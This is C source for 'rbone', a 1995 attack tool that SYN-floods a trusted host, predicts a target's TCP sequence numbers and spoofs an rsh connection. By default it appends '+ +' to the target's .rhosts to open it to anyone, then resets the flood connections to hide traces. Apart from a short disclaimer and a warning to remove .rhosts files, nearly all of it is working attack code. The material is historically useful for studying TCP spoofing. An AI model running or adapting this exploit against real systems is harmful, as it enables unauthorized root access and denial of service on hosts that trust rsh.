/* rbone - v0.0 - Michael R. Widner (atreus) - 4/19/95
 * widner@uchicago.edu - atreus@primus.com
 *
 * rbone uses tcp sequence guessing to spoof a connection to the remote
 * shell port (rsh, 514, etc.) and abuse a .rhosts file.  The user of
 * rbone must know pretty much an exact entry in an rhosts file.  Sometimes
 * this is easy to determine.  Sometimes it's a little harder.  The
 * clever [cr|h]acker can figure it out, otherwise the brute force approach
 * works for those that are really persistent.
 *
 * Moral to this story:  Get rid of all your .rhosts files and hosts.equiv
 * files.  Yeah, they're convenient.  Sometimes they even seem like a good
 * security feature.  Such as if system A is on a subnet with lab PCs and
 * you know how easy it is for anybody to sniff root logins or telnets
 * followed by su's.  Host B is on your desktop.  How do you get a root
 * shell on A w/o being sniffed?  An rhosts file of course.  Well, there's
 * clearly a problem with that, and this program exists solely to demonstrate
 * it.  Of course it can be easily modified for all your sequence predicting
 * and packet spoofing needs.
 *
 * Much of the code here was written by Mike Neuman.  He distributed it on
 * bugtraq in an incomplete form.  It lacked the library routines needed
 * to actually do any of the packet capture or spoofing.  My solution was
 * simple.  Use the excellent pcap library for packet capture and my own
 * routines that I did a while back for packet spoofing.  The pcap stuff
 * is well written.  My packet spoofing code is a mess.  Oh well.  I also
 * made some changes to Neuman's code.
 *
 * I usually don't bother with the lecture on proper use, but this can
 * be used for a lot of evil since so many systems are subject to this
 * hole.  So here's your lecture:
 *
 * This code is for demonstration purposes only.  I do not advocate the
 * use of this code without the expressed written consent of the owners
 * and operators of all systems in any way involved in the use of this
 * program.
 * Breaking into other people's systems is just plain wrong.  It's a
 * really bad thing to do.  Don't do it.  Do you hear me?  You immoral
 * cracking bastards?  Don't even think about it.
 *
 * Neuman's disclaimer follows.
 */
/* This source is subject to the GNU PUBLIC LICENSE. It can be used freely
 * for any non-commercial purpose, and this message and the contact 
 * information must remain intact. For commercial purposes, you MUST contact
 * us to obtain a license for it's use. A copy of the GNU PUBLIC LICENSE is
 * available from: ftp://aeneas.mit.edu/pub/gnu/
 *
 *     This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 * Mike Neuman
 * En Garde Systems 
 * 525 Clara Avenue, Suite 202
 * St. Louis, MO  63112
 * mcn@EnGarde.com
 */

#include <stdio.h>
#include <stdlib.h>
#include <setjmp.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <net/if.h>
#include <netinet/if_ether.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <errno.h>
#include <netdb.h>

/* additions for prototypes and such */
#include <arpa/inet.h>
#include <malloc.h>

/* Include generic pcap interface headers. */
#include <pcap.h>
#include <pcap-int.h>
#include "packet_spoof.h"

/* The host to spoof flooding the trusted
 * host's destination port from. This host shouldn't exist, but should have
 * correct routing entries. The important part is so that returned packets
 * go to nowhere.  You may want/need to change this.  Most of the
 * 198.137.241.x subnet will work, but you may not feel comfortable using
 * it.
 */
#ifndef BADHOST
#define BADHOST "128.0.0.1"
#endif

/* The number of connections to spoof from BADHOST. I made this big. 
 * I've found 4.4BSD will be flooded with only 8 unacked connections. Your
 * mileage may vary
 */
#define NUMSEQUENCE 80 

/* How many samples of the sequence numbers do you want to take?
 * I randomly picked 10 and only take the last result. If I wanted to be
 * elegant, I'd do some sort of statistical average. Sequence numbers
 * are generally updated by a fixed number, this attempts to compute
 * this number taking into account average network lag. Fixed sequence
 * number updating currently works on: Solaris 2.x, NeXTstep, 4.4BSD, and
 * probably others, although I haven't tested them.
 */
#define NUMTESTS 10

/* The ethernet address of your router.  Get it from arp. */
#ifndef ROUTER_ETHER
#define ROUTER_ETHER "00:00:0C:01:A2:39"
#endif
struct ether_addr *dest_ether, *source_ether;

/* Global pcap descriptor & stuff */
pcap_t *pd;
char   *device=NULL;
char   errbuf[PCAP_ERRBUF_SIZE];
struct bpf_program fcode;
struct pcap_pkthdr pc_header;
u_long localnet, netmask;


/* My pcap based substitute for the readpacket() routine
 * Not nearly as flexible, but suitable for this application.  */
/* readpacket(
*  struct fddi_header  fddi_header,
*  struct ether_header ether_header,
*  struct ip           ip_header,
*  struct udphdr       udp_header,
*  struct tcphdr       tcp_header,
*  char *              data,
*  int                 datalen)
*
* return type is the type of packet read
*/
int readpacket(void *fddi_header, void *ether_header, 
	struct ip *ip_header, struct udphdr *udp_header,
	struct tcphdr *tcp_header, char *data, int datalen)
{
        u_char *p_data;

	/* For some very strange reason it is sometimes necessary to have
	 * some call here before we go to pcap_next.  I'm at a total loss.
	 * Without this call pcap_next does its tricks and eventually
	 * recvfrom() is called and fails with error EINVAL (Invalid argument).
	 */
	printf(".");
        if((p_data=pcap_next(pd, &pc_header))==NULL)
		{
                pcap_perror(pd,"pcap err in readpacket");
		exit(1);
		}

/*	printf("returned packet with length=%i\n",pc_header.len); */
/* This needs to be slightly modified for slip or ppp.  See the '14's
 * below?  Thats the size of the ethernet header.  On Linux slip there
 * is no link level header at all, so the packet will just start with the
 * IP.  In other words, change the 14 to a 0.  I don't think this is true
 * of slip in general, but I don't know for sure.  ppp has a header length
 * of 4 I believe.  */
        if (ip_header)
        memcpy(ip_header,p_data+14,sizeof(struct ip));
        if (tcp_header)
        memcpy(tcp_header,p_data+14+sizeof(struct ip),sizeof(struct tcphdr));
        if (udp_header)
        memcpy(udp_header,p_data+14+sizeof(struct ip),sizeof(struct udphdr));
	return(pc_header.len);
}

/* usage */
void usage()
{
        (void)fprintf(stderr,
            "usage: rbone [options] trusted_host host_to_attack\n");
        fprintf(stderr,"  -e string  specify e-net gateway as xx:xx:xx:xx:xx:xx\n");
        fprintf(stderr,"  -c string  command to execute on attacked host\n");
        fprintf(stderr,"  -l string  local user on trusted host [default is root]\n");
        fprintf(stderr,"  -r string  remote user on attacked host [default is root]\n");
        fprintf(stderr,"  -b host    non-existent, but reachable, machine\n");
        fprintf(stderr,"  -d device  device on which to listen\n");
        exit(1);
}


int hose_trusted(u_long trust_addr, u_long bad_addr, u_long *seq_num,
		u_long *port_num)
/* u_long seq_num[NUMSEQUENCE];
u_long port_num[NUMSEQUENCE]; */
{
	int i;
	u_long start_seq=49358353+getpid(); /* Make this anything you want */
	u_long start_port=600; /* Make this anything you want */
	struct ether_header eh;

	/* setup ethernet header */
	memcpy(&(eh.ether_dhost),dest_ether,sizeof(struct ether_addr));
	memcpy(&(eh.ether_shost),source_ether,sizeof(struct ether_addr));
	eh.ether_type=ETHERTYPE_IP;

	/* Send a whole bunch of spoofed SYNs. Arguments to sendtcppacket_simple
	 * are:
	 * sendtcppacket_simple(
	 *     char *ether_addr source_hardware_address,
	 *     char *ether_addr destination_hardware_address,
	 *     u_long            source_ip_address,
	 *     u_long            destination_ip_address,
	 *     u_short           source_port,
	 *     u_short           destination_port,
	 *     u_long            sequence_number,
	 *     u_long            acknowldegement_number,
	 *     int               TCP flags (SYN, RST, ACK, PUSH, FIN),
	 *     char *            data,
	 *     int               datalen)
	 */
	for (i=0;i<NUMSEQUENCE;i++) {
		port_num[i]=start_port++; /* record the ports and sequence numbers */
		seq_num[i]=start_seq++;   /* for later reseting */

		sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
			bad_addr, trust_addr,
			port_num[i], 513, /* 513 is rlogin/rsh port */
			seq_num[i], (u_long)0,
			TH_SYN, NULL, 0);
	}
	return(0);
}

jmp_buf env;

void timedout()
{
	longjmp(env, 1);
}

int determine_sequence(u_long targ_addr, u_long *next_seq, u_long *offset)
{
	struct hostent *he;
	struct ether_header eh, eh2;
	struct ip iph;
	struct tcphdr tcph;
	int i,index=0;
	u_long start_seq=4138353+getpid(); /* Make this anything you want */
	u_long start_port=666;		 /* Make this anything you want */
	u_long my_addr;
	char buf[80];
	u_long prev_seq=0, diff=0;
	char OScount[100];		/* These store the offset value */
	u_long OSvalue[100];		/* and repetition counts */

	for(i=0;i<100;i++)
		{ OScount[i]=0;
		OSvalue[i]=0; }
	*offset=0;

	/* setup ethernet header */
	memcpy(&(eh.ether_dhost),dest_ether,sizeof(struct ether_addr));
	memcpy(&(eh.ether_shost),source_ether,sizeof(struct ether_addr));
	eh.ether_type=ETHERTYPE_IP;

	gethostname(buf, 79);
	if ((he=gethostbyname(buf))==NULL) {
		fprintf(stderr, "Can't get my hostname!?\n");
		return(1);
	}
	bcopy(he->h_addr, &my_addr, 4);
	for (i=0;i<NUMTESTS;i++) {
		/* Do a setjmp here for timeouts */
		if (setjmp(env)) 
			fprintf(stderr, "Response Timed out... Resending...\n");
		signal(SIGALRM, timedout);
		alarm(0);
		alarm(10); /* Wait 10 seconds for reply */
		sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
			my_addr, targ_addr,
			start_port, 514, /* 514 is rsh port */
			start_seq, 0,
			TH_SYN, NULL, 0);
		/* Send connection request packet */

		for (;;) {
			/* Wait until the reply is received. Arguments for readpacket
			 * are:
			 * readpacket(
			 *  struct fddi_header  fddi_header,
			 *  struct ether_header ether_header,
			 *  struct ip           ip_header,
			 *  struct udphdr       udp_header,
			 *  struct tcphdr       tcp_header,
			 *  char *              data,
			 *  int                 datalen)
			 *
			 * return type is the type of packet read
			 */
			readpacket(NULL, &eh2, &iph, NULL, &tcph, NULL, 0);
			if (ntohs(tcph.th_dport)==start_port &&
				ntohs(tcph.th_sport)==514) {
				/* If the ports match, it's probably a reply--this isn't
				 * definite, but it's a pretty good guess. */
				/* This determines sequence offsets for NUMTEST different
				 * connections, then chooses the most common value to apply
				 * to our spoof. */
					if (prev_seq) {
						diff=ntohl(tcph.th_seq)-prev_seq;
						printf("(prev=%lu, new=%lu, diff=%lu\n", prev_seq,
							ntohl(tcph.th_seq), diff);
					} else
						diff=0;
					if (*offset==0) {
						*offset=diff;
						OSvalue[index]=diff;
						OScount[index]++;    }
					else {
						if (*offset!=diff)
						{
							printf("Difference in Offset: old=%lu, new=%lu\n",
								*offset, diff);
							index=0;
							while((OSvalue[index]) && (OSvalue[index]!=diff))
								index++;
							OScount[index]++;
							OSvalue[index]=diff;
						}
						else 
							OScount[index]++;
					}
					prev_seq=ntohl(tcph.th_seq);
					sendtcppacket_simple(
							&(eh.ether_shost), &(eh.ether_dhost),
							my_addr, targ_addr,
							start_port++, 514, 
							start_seq++, 0,
							TH_RST, NULL, 0);
					/* Send a reset to close the connection. Note, this
					 * automatically will be sent by localhost unless
					 * a service is listening on whatever port you've
					 * chosen to start with at the top of this routine.
					 * so I reset it anyway
					 */
					break; /* out of infinite for */
				}
		} /* of infinite for */
		alarm(0);
	} /* for i=0 i<NUMTESTS... */
	i=0;
	for(index=0;index<100;index++)
		if(OScount[index]>OScount[i]) i=index;
	*offset=OSvalue[i];
	*next_seq=prev_seq+*offset;
	printf("Using offset=%lu, next_seq=%lu.  Occurred %i of %i trials.%n",
		*offset, *next_seq, OSvalue[i], NUMTESTS);
	return(0);
}

int spoof_connection(u_long trust_addr, u_long targ_addr, u_long next_seq,
	char *string, int stringlen)
{
	struct ether_header eh;
	u_short port=513;
	u_long seq=385773357;
	int i;

	/* setup ethernet header */
	memcpy(&(eh.ether_dhost),dest_ether,sizeof(struct ether_addr));
	memcpy(&(eh.ether_shost),source_ether,sizeof(struct ether_addr));
	eh.ether_type=ETHERTYPE_IP;

	/* Send a syn with our own sequence number */
	sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
		trust_addr, targ_addr,
		port, 514,
		seq++, 0,
		TH_SYN, NULL, 0);
	usleep(5000); /* wait for the other side to SYN,ACK */

	/* Send the ACK for the sequence number we guessed. I've found we guess
	 * right about 90% of the time
	 */
	printf("Sending spoof with next_seq=%li\n",next_seq);
	sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
		trust_addr, targ_addr,
		port, 514,
		seq, ++next_seq,
		TH_ACK, NULL, 0);

	/* Now, send our rsh request with the proper sequence and ACK nubmers */
	sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
		trust_addr, targ_addr,
		port, 514,
		seq, next_seq,
		TH_ACK, string, stringlen);
	seq+=stringlen;

	sleep(1); /* Wait for it to be received, ACKd, and processed */
	/* Send a fin with the our new sequence number and their sequence number */
	sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
		trust_addr, targ_addr,
		port, 514,
		seq, next_seq,
		TH_FIN, NULL, 0);

	for (i=1;i<4;i++) { /* Send a bunch of ACKs */
		/* If we screwed up the guessing the correct sequence number the remote
		 * host is using, guess a whole bunch more just to be sure. We could
		 * probably reset the connection, but it's better to have the
		 * net software hang waiting for a proper FIN/ACK than have the
		 * application that we've spoofed into running exit because we
		 * reset the connection.
		 */
		sleep(2);
		sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
			trust_addr, targ_addr,
			port, 514,
			seq+1, next_seq+i,
			TH_ACK, NULL, 0);
	}
	usleep(50000); /* Finally, send a RST */
	/* Now, if we're really screwed, and ~8 seconds later  we haven't guessed
	 * the right sequence number, just reset the connection. Hopefully by now
	 * the application has done it's job, so resetting shouldn't cause any
	 * problems.
	 */
	sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
		trust_addr, targ_addr,
		port, 514,
		seq+1, next_seq+4,
		TH_RST, NULL, 0);

	return(0);
}

int reset_trusted(u_long trust_addr, u_long *seq_num, u_long *port_num)
/* u_long seq_num[NUMSEQUENCE], port_num[NUMSEQUENCE]; */
{
	struct ether_header eh;
	u_long bad_addr;
	int i;

	if ((bad_addr=inet_addr(BADHOST))==(u_long)-1) {
		fprintf(stderr, "Can't convert BADHOST address.\n");
		return(1);
	}

	/* setup ethernet header */
	memcpy(&(eh.ether_dhost),dest_ether,sizeof(struct ether_addr));
	memcpy(&(eh.ether_shost),source_ether,sizeof(struct ether_addr));
	eh.ether_type=ETHERTYPE_IP;

	/* Reset all of the connections we started before */
	for (i=0;i<NUMSEQUENCE;i++) {
		sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
			bad_addr, trust_addr,
			port_num[i], 513,
			seq_num[i], 0,
			TH_RST, NULL, 0);
	}
	return(0);
}

/* Generic error handling and exiting routine. */
void error(char *err)
{
	printf("error: %s\n",err);
	exit(255);
}

int main(int argc, char **argv)
{
struct hostent *he;
u_long trust_addr, targ_addr;
u_long seq_num[NUMSEQUENCE], port_num[NUMSEQUENCE];
u_long next_seq, offset;
/* just other crap */
char *ether_name=NULL;
char *local_user=NULL, *remote_user=NULL, *command=NULL, *send_string;
char *bogus_host=NULL;
u_long bogus_addr;
int command_length, string_index;

	char ch;
	extern int optind;
	extern char *optarg;
	extern int opterr;

	opterr=0;
	while ((ch = getopt(argc, argv, "e:l:r:b:c:d:")) != EOF)
	switch(ch) {
		case 'e':
			ether_name=optarg;
			break;
		case 'l':
			local_user=optarg;
			break;
		case 'b':
			bogus_host=optarg;
			break;
		case 'r':
			remote_user=optarg;
			break;
		case 'c':
			command=optarg;
			break;
		case 'd':
			device=optarg;
			break;
		case 'h':
		case 'H':
		default:
			usage();
			exit(1);
		}

	argc -= optind;
	argv += optind;

	if (argc<2) {
		usage();
	}

	if ((he=gethostbyname(argv[0]))==NULL) {
		trust_addr=inet_addr(argv[0]);
		if (trust_addr==(u_long)-1) {
			fprintf(stderr, "Unknown host %s\n", argv[0]);
			exit(1);
		}
	} else
		bcopy(he->h_addr, &trust_addr, 4);

	if ((he=gethostbyname(argv[1]))==NULL) {
		targ_addr=inet_addr(argv[1]);
		if (targ_addr==(u_long)-1) {
			fprintf(stderr, "Unknown host %s\n", argv[1]);
			exit(1);
		}
	} else
		bcopy(he->h_addr, &targ_addr, 4);

        if ((he=gethostbyname(bogus_host ? bogus_host : BADHOST ))==NULL) {
                bogus_addr=inet_addr(bogus_host ? bogus_host : BADHOST );
                if (bogus_addr==(u_long)-1) {
                        fprintf(stderr, "Unknown host %s\n",
				bogus_host ? bogus_host : BADHOST );
                        exit(1);
                }
        } else
                bcopy(he->h_addr, &bogus_addr, 4);

	/* translate our ethernet address into usable form */
	dest_ether=ether_a2e(ether_name ? ether_name : ROUTER_ETHER);
	source_ether=dest_ether;

	/* set up the pcap interface */
	printf("Setting up pcap interface and filter ");
	if (device == NULL ) {
		device=pcap_lookupdev(errbuf);
		if (device==NULL)
			error("couldn't lookup pcap device");
	}
	printf("on device %s\n",device);
	pd=pcap_open_live(device,512,1,1000,errbuf);
	if (pd==NULL)
		error(errbuf);
	if (pcap_lookupnet(device,&localnet, &netmask, errbuf) <0)
		error(errbuf);

	/* Compile and install some packet matching code. */	
	if (pcap_compile(pd, &fcode, "tcp", 1, netmask) < 0)
		error("Compiling filter code");
	if (pcap_setfilter(pd,&fcode)<0)
		error("Setting pcapfilter");

	/* allocate and build the command string */
	send_string=(char *)malloc(256);
	send_string[0]='0';
	send_string[1]='\0';
	string_index=2;
	command_length=(local_user ? strlen(local_user) : strlen("root"));
	strcpy(send_string+string_index,local_user ? local_user : "root");
	string_index=string_index+command_length+1;
	command_length=remote_user ? strlen(remote_user) : strlen("root");
	strcpy(send_string+string_index,remote_user ? remote_user : "root");
	string_index=string_index+command_length+1;
	command_length=command ? strlen(command) : strlen("echo + + >> .rhosts");
	strcpy(send_string+string_index,command ? command : "echo + + >> .rhosts");
	string_index=string_index+command_length+1;
/*	for(command_length=0;command_length<string_index;command_length++)
		printf("%c",send_string[command_length]);
	printf("\n"); */

	/* First, send NUMSEQUENCE connection requests from bogus_addr to the 
	 * trusted host on a trusted port (currently 513). Trusted host will 
	 * attempt to SYN-ACK these. If BADHOST doesn't exist, there will never
	 * be a response ACK. Consequently, trusted host's connection queue will
	 * fill and it will no longer respond to any packets to port 513.
	 */

	printf("[Hosing Trusted Host...]\n");
	if (hose_trusted(trust_addr, bogus_addr, seq_num, port_num)) {
		fprintf(stderr, "Couldn't hose %s\n", argv[1]);
		exit(1);
	}
	
	/* Next, do a sampling of the difference in sequence numbers. These packets
	 * are NOT spoofed as receiving the reply is required. Consequently, this
	 * host can appear in any packet traces.
	 */
	printf("[Determining sequence numbers...]\n");
	if (determine_sequence(targ_addr, &next_seq, &offset)) {
		fprintf(stderr, "Couldn't determine sequence numbers for %s\n", argv[2]);
		exit(1);
	}

	printf("=>Next sequence number is: %lu, offset is: %lu\n", next_seq, offset);

	/* Next, do the actual spoofed connection, now that we know what the next
	 * sequence number will be.
	 */

	printf("[Spoofing Connection...]\n");
	if (spoof_connection(trust_addr, targ_addr, next_seq, 
			send_string, string_index)) {
		fprintf(stderr, "Couldn't spoof connection to %s\n", argv[1]);
		exit(1);
	}

	/* Finally, reset all of the half started connections on trusted-host.
	 * This will put trusted-host back into it's normal state (and hide
	 * the traces that it was used for evil.
	 */
	printf("[Cleaning Up Trusted Mess...]\n");
	if (reset_trusted(trust_addr, seq_num, port_num)) {
		fprintf(stderr, "Couldn't reset %s. Sucks to be it.\n", argv[1]);
		exit(1);
	}

	/* fin */
	exit(0);
}
